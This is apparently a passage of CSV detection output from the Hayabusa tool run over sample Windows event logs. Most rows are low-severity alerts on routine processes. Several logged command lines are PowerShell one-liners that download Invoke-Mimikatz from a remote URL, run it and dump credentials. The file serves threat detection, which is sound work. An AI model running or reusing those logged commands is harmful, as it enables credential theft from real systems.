0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 06:32:15.491 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xb54 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 07:03:41.021 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: 
C:\Windows\System32\dllhost.exe | PID: 0x7a4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 07:04:04.853 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x130 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 07:05:07.184 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x638 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 07:05:22.839 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x794 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 07:38:23.648 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x790 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 08:21:28.626 +09:00,IE10Win7,4688,low,,Suspicious 
Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x628 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 08:21:32.207 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd94 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 08:21:32.340 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdec | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 08:21:38.772 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x42c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 08:21:41.273 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf8c | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 08:21:41.456 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf68 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 08:21:52.074 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\ri1rh0d1.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xb9c | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 08:29:34.138 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x674 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 08:29:34.389 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x31c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 08:29:35.564 
+09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\nkjhcxgj.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xfa0 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 08:36:49.583 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb80 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 08:36:49.699 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfec | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 08:36:50.791 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\gajrh2ob.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xcbc | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:00:02.041 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN 
""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x430 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:11:22.985 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x4b8 | User: IEUser | LID: 0x6593d",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:11:22.985 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:11:45.826 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd50 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:11:45.870 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd70 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:11:52.496 
+09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x62c | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:11:52.496 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:14:19.540 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('http://eic.me/17'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9a4 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:14:19.540 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:20:41.106 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb80 | User: IEUser | LID: 
0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:20:41.106 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:20:56.173 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('http://eic.me/17'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdb8 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:20:56.173 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 10:00:00.931 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xd78 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 10:28:55.331 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x300 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 10:28:55.343 
+09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x59c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 12:38:31.558 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc30 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 12:38:32.423 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x304 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 12:38:32.538 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x370 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 12:38:43.023 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xce4 | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 12:44:04.646 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x380 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 12:44:04.653 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x7dc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 21:48:41.680 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x23c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 21:48:42.006 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x9d4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 21:48:42.440 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\makecab.exe"" C:\Windows\Logs\CBS\CbsPersist_20160920124842.log 
C:\Windows\Logs\CBS\CbsPersist_20160920124842.cab | Path: C:\Windows\System32\makecab.exe | PID: 0x914 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 21:48:42.724 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfe0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 21:48:46.672 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x718 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 21:48:54.436 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb70 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 22:07:13.234 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0xc20 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 22:07:23.000 +09:00,IE10Win7,6006,info,,Event Log Service 
Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 22:07:41.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 22:07:43.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-20 22:07:44.179 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6e8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 22:07:44.757 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1c0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 22:07:58.039 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x9a0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 22:07:58.101 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: 
C:\Windows\System32\gpscript.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 22:07:59.540 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb84 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 22:08:00.110 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xc1c | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 22:08:00.615 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xc38 | User: IEUser | LID: 0x6793c,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 22:08:01.982 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc5c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 22:10:32.160 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x3a0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 22:20:59.082 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -responsepester | Path: C:\Windows\System32\rundll32.exe | PID: 0x87c | User: IEUser | LID: 0x6796c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 22:25:15.535 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: 